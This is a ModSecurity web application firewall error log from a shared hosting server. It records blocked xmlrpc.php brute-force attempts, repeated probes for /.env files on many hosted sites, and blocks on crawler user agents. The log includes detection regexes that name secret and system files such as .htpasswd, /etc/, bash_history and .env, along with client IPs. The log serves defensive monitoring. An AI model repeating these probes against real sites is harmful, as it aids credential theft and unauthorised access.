[Tue May 26 16:40:38.607524 2026] [security2:error] [pid 817651:tid 817809] [client 117.198.37.168:51794] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_rtlGRCPPN1dS2y2lmAAAAKE"]
[Tue May 26 16:40:38.607870 2026] [security2:error] [pid 817651:tid 817809] [client 117.198.37.168:51794] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_rtlGRCPPN1dS2y2lmAAAAKE"]
[Tue May 26 16:40:38.659209 2026] [security2:error] [pid 817651:tid 817789] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_rNlGRCPPN1dS2y2lbgAAAI0"]
[Tue May 26 16:40:40.101671 2026] [security2:error] [pid 817651:tid 817811] [client 195.178.110.34:43170] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/app/.env"] [unique_id "ahV_sNlGRCPPN1dS2y2l0wAAAKM"]
[Tue May 26 16:40:41.049277 2026] [security2:error] [pid 817651:tid 817802] [client 34.41.132.139:61176] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.vcresco.com"] [uri "/xmlrpc.php"] [unique_id "ahV_sNlGRCPPN1dS2y2l5AAAAJo"]
[Tue May 26 16:40:41.257005 2026] [security2:error] [pid 817651:tid 817894] [client 34.41.132.139:58923] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.vcresco.com"] [uri "/xmlrpc.php"] [unique_id "ahV_sdlGRCPPN1dS2y2l9QAAAPY"]
[Tue May 26 16:40:41.447940 2026] [security2:error] [pid 817651:tid 817795] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_r9lGRCPPN1dS2y2ltAAAAJM"]
[Tue May 26 16:40:41.512898 2026] [security2:error] [pid 817651:tid 817823] [client 34.41.132.139:50586] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.vcresco.com"] [uri "/xmlrpc.php"] [unique_id "ahV_sdlGRCPPN1dS2y2l-QAAAK8"]
[Tue May 26 16:40:41.746963 2026] [security2:error] [pid 817651:tid 817797] [client 34.41.132.139:61349] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.vcresco.com"] [uri "/xmlrpc.php"] [unique_id "ahV_sdlGRCPPN1dS2y2l-wAAAJU"]
[Tue May 26 16:40:42.016492 2026] [security2:error] [pid 817651:tid 817791] [client 34.41.132.139:63118] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.vcresco.com"] [uri "/xmlrpc.php"] [unique_id "ahV_sdlGRCPPN1dS2y2mBQAAAI8"]
[Tue May 26 16:40:42.263559 2026] [security2:error] [pid 817651:tid 817788] [client 34.41.132.139:58052] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.vcresco.com"] [uri "/xmlrpc.php"] [unique_id "ahV_stlGRCPPN1dS2y2mCQAAAIw"]
[Tue May 26 16:40:42.543664 2026] [security2:error] [pid 817651:tid 817816] [client 34.41.132.139:55477] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.vcresco.com"] [uri "/xmlrpc.php"] [unique_id "ahV_stlGRCPPN1dS2y2mEAAAAKg"]
[Tue May 26 16:40:42.825828 2026] [security2:error] [pid 817651:tid 817848] [client 85.208.96.206:57276] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahV_stlGRCPPN1dS2y2mGQAAAMg"]
[Tue May 26 16:40:42.825965 2026] [security2:error] [pid 817651:tid 817848] [client 85.208.96.206:57276] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahV_stlGRCPPN1dS2y2mGQAAAMg"]
[Tue May 26 16:40:42.873575 2026] [security2:error] [pid 817651:tid 817856] [client 34.41.132.139:54757] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.vcresco.com"] [uri "/xmlrpc.php"] [unique_id "ahV_stlGRCPPN1dS2y2mHQAAANA"]
[Tue May 26 16:40:43.238080 2026] [security2:error] [pid 817651:tid 817801] [client 34.41.132.139:62824] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.vcresco.com"] [uri "/xmlrpc.php"] [unique_id "ahV_s9lGRCPPN1dS2y2mJgAAAJk"]
[Tue May 26 16:40:43.506351 2026] [security2:error] [pid 817651:tid 817846] [client 34.41.132.139:55494] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.vcresco.com"] [uri "/xmlrpc.php"] [unique_id "ahV_s9lGRCPPN1dS2y2mMAAAAMY"]
[Tue May 26 16:40:43.633989 2026] [security2:error] [pid 817651:tid 817877] [client 176.65.139.229:59258] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/.env"] [unique_id "ahV_s9lGRCPPN1dS2y2mPAAAAOU"]
[Tue May 26 16:40:43.858439 2026] [security2:error] [pid 817651:tid 817816] [client 34.41.132.139:56205] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.vcresco.com"] [uri "/xmlrpc.php"] [unique_id "ahV_s9lGRCPPN1dS2y2mRQAAAKg"]
[Tue May 26 16:40:43.980281 2026] [security2:error] [pid 817651:tid 817835] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_sdlGRCPPN1dS2y2l9AAAALs"]
[Tue May 26 16:40:44.117376 2026] [security2:error] [pid 817651:tid 817801] [client 34.41.132.139:59180] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "www.vcresco.com"] [uri "/xmlrpc.php"] [unique_id "ahV_tNlGRCPPN1dS2y2mSwAAAJk"]
[Tue May 26 16:40:44.117503 2026] [security2:error] [pid 817651:tid 817801] [client 34.41.132.139:59180] ModSecurity: Warning. Operator GE matched 2 at IP:dos_burst_counter. [file "/etc/httpd/modsecurity.d/03_asl_dos.conf"] [line "99"] [id "350114"] [rev "1"] [msg "Atomicorp.com WAF Rules: Potential Denial of Service (DoS) Attack from  - # of Request Bursts: 2"] [severity "ERROR"] [tag "no_ar"] [hostname "www.vcresco.com"] [uri "/xmlrpc.php"] [unique_id "ahV_tNlGRCPPN1dS2y2mSwAAAJk"]
[Tue May 26 16:40:44.117542 2026] [security2:error] [pid 817651:tid 817801] [client 34.41.132.139:59180] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "www.vcresco.com"] [uri "/xmlrpc.php"] [unique_id "ahV_tNlGRCPPN1dS2y2mSwAAAJk"]
[Tue May 26 16:40:44.590873 2026] [security2:error] [pid 817651:tid 817781] [client 176.65.139.239:55994] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "preetishah.moes-art.com"] [uri "/.env"] [unique_id "ahV_tNlGRCPPN1dS2y2mWgAAAIU"]
[Tue May 26 16:40:44.749112 2026] [security2:error] [pid 817651:tid 817854] [client 176.65.139.238:35290] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "shahvishaal.moes-art.com"] [uri "/.env"] [unique_id "ahV_tNlGRCPPN1dS2y2mWwAAAM4"]
[Tue May 26 16:40:44.912227 2026] [security2:error] [pid 817651:tid 817856] [client 176.65.139.229:59272] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vishaal-shah.moes-art.com"] [uri "/.env"] [unique_id "ahV_tNlGRCPPN1dS2y2maAAAANA"]
[Tue May 26 16:40:45.065358 2026] [security2:error] [pid 817651:tid 817824] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_stlGRCPPN1dS2y2mEwAAALA"]
[Tue May 26 16:40:45.891986 2026] [security2:error] [pid 817651:tid 817794] [client 176.65.139.237:45018] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "unstumbled.moes-art.com"] [uri "/.env"] [unique_id "ahV_tdlGRCPPN1dS2y2mhQAAAJI"]
[Tue May 26 16:40:45.893737 2026] [security2:error] [pid 817651:tid 817874] [client 176.65.139.238:35300] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "leakyleaks.moes-art.com"] [uri "/.env"] [unique_id "ahV_tdlGRCPPN1dS2y2mhgAAAOI"]
[Tue May 26 16:40:46.702310 2026] [security2:error] [pid 817651:tid 817815] [client 195.178.110.34:38562] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/dev/.env"] [unique_id "ahV_ttlGRCPPN1dS2y2mnwAAAKc"]
[Tue May 26 16:40:47.730723 2026] [security2:error] [pid 817651:tid 817868] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_tdlGRCPPN1dS2y2mdwAAANw"]
[Tue May 26 16:40:47.803558 2026] [proxy:error] [pid 817651:tid 817761] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:40:47.803618 2026] [proxy_http:error] [pid 817651:tid 817761] [remote 205.210.31.45:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:40:47.804275 2026] [proxy:error] [pid 817651:tid 817761] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:40:47.804312 2026] [proxy_http:error] [pid 817651:tid 817761] [remote 205.210.31.45:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:40:49.042983 2026] [security2:error] [pid 817651:tid 817878] [client 117.198.37.168:52108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_udlGRCPPN1dS2y2m4wAAAOY"]
[Tue May 26 16:40:49.043154 2026] [security2:error] [pid 817651:tid 817878] [client 117.198.37.168:52108] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_udlGRCPPN1dS2y2m4wAAAOY"]
[Tue May 26 16:40:49.110518 2026] [security2:error] [pid 817651:tid 817807] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahV_udlGRCPPN1dS2y2m5QAAAJ8"]
[Tue May 26 16:40:49.110885 2026] [security2:error] [pid 817651:tid 817802] [client 66.249.64.109:46722] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahV_uNlGRCPPN1dS2y2m4gAAAJo"]
[Tue May 26 16:40:50.038126 2026] [security2:error] [pid 817651:tid 817808] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_t9lGRCPPN1dS2y2mrwAAAKA"]
[Tue May 26 16:40:52.654203 2026] [security2:error] [pid 817651:tid 817850] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_uNlGRCPPN1dS2y2m4QAAAMo"]
[Tue May 26 16:40:53.674200 2026] [security2:error] [pid 817651:tid 817811] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_u9lGRCPPN1dS2y2m-wAAAKM"]
[Tue May 26 16:40:54.294754 2026] [security2:error] [pid 817651:tid 817710] [remote 74.7.241.58:46534] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV_vtlGRCPPN1dS2y2nWAAAtTo"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes/IXR
[Tue May 26 16:40:54.792427 2026] [security2:error] [pid 817651:tid 817790] [client 114.119.148.237:47201] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahV_vtlGRCPPN1dS2y2naQAAAI4"], referer: http://haddingtonwines.com/cart?remove_item=45e81409831b77407fbc22afc09f0d78
[Tue May 26 16:40:55.668457 2026] [security2:error] [pid 817651:tid 817819] [client 176.65.139.239:51332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahV_v9lGRCPPN1dS2y2ndQAAAKs"]
[Tue May 26 16:40:55.992182 2026] [security2:error] [pid 817651:tid 817834] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_vNlGRCPPN1dS2y2nJgAAALo"]
[Tue May 26 16:40:57.001982 2026] [security2:error] [pid 817651:tid 817813] [client 176.65.139.232:47368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujoverseas.anujtradingco.com"] [uri "/.env"] [unique_id "ahV_wdlGRCPPN1dS2y2nkwAAAKU"]
[Tue May 26 16:40:57.725098 2026] [security2:error] [pid 817651:tid 817850] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_vtlGRCPPN1dS2y2nbQAAAMo"]
[Tue May 26 16:40:59.533556 2026] [security2:error] [pid 817651:tid 817901] [client 117.198.37.168:52424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_w9lGRCPPN1dS2y2n0gAAAP0"]
[Tue May 26 16:40:59.533688 2026] [security2:error] [pid 817651:tid 817901] [client 117.198.37.168:52424] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_w9lGRCPPN1dS2y2n0gAAAP0"]
[Tue May 26 16:41:00.113730 2026] [security2:error] [pid 817651:tid 817833] [client 173.252.69.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahV_w9lGRCPPN1dS2y2n4gAAALk"]
[Tue May 26 16:41:00.211206 2026] [security2:error] [pid 817651:tid 817828] [client 173.252.69.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahV_xNlGRCPPN1dS2y2n7AAAALQ"]
[Tue May 26 16:41:00.320115 2026] [security2:error] [pid 817651:tid 817792] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_wdlGRCPPN1dS2y2nnwAAAJA"]
[Tue May 26 16:41:02.128736 2026] [security2:error] [pid 817651:tid 817829] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_w9lGRCPPN1dS2y2nygAAALU"]
[Tue May 26 16:41:03.188394 2026] [security2:error] [pid 817651:tid 817692] [remote 198.244.183.139:36644] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.dnvexpress.in"] [uri "/robots.txt"] [unique_id "ahV_x9lGRCPPN1dS2y2oQQAAxig"]
[Tue May 26 16:41:03.188677 2026] [security2:error] [pid 817651:tid 817846] [client 198.244.183.139:36644] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.dnvexpress.in"] [uri "/robots.txt"] [unique_id "ahV_x9lGRCPPN1dS2y2oQQAAxig"]
[Tue May 26 16:41:03.276268 2026] [security2:error] [pid 817651:tid 817874] [client 14.191.25.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_xNlGRCPPN1dS2y2n-QAAAOI"]
[Tue May 26 16:41:03.968610 2026] [security2:error] [pid 817651:tid 817872] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_xdlGRCPPN1dS2y2oDQAAAOA"]
[Tue May 26 16:41:04.554749 2026] [security2:error] [pid 817651:tid 817803] [client 103.131.71.161:0] ModSecurity: Warning. Matched phrase "coccocbot-web" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "aastha-enterprises.com"] [uri "/robots.txt"] [unique_id "ahV_yNlGRCPPN1dS2y2oWAAAAJs"]
[Tue May 26 16:41:04.555227 2026] [security2:error] [pid 817651:tid 817876] [client 103.131.71.161:42403] ModSecurity: Warning. Matched phrase "coccocbot-web" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "aastha-enterprises.com"] [uri "/robots.txt"] [unique_id "ahV_yNlGRCPPN1dS2y2oVgAAAOQ"]
[Tue May 26 16:41:04.681862 2026] [security2:error] [pid 817651:tid 817732] [remote 51.222.95.63:59262] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.dnvexpress.in"] [uri "/"] [unique_id "ahV_yNlGRCPPN1dS2y2oWQAAslA"]
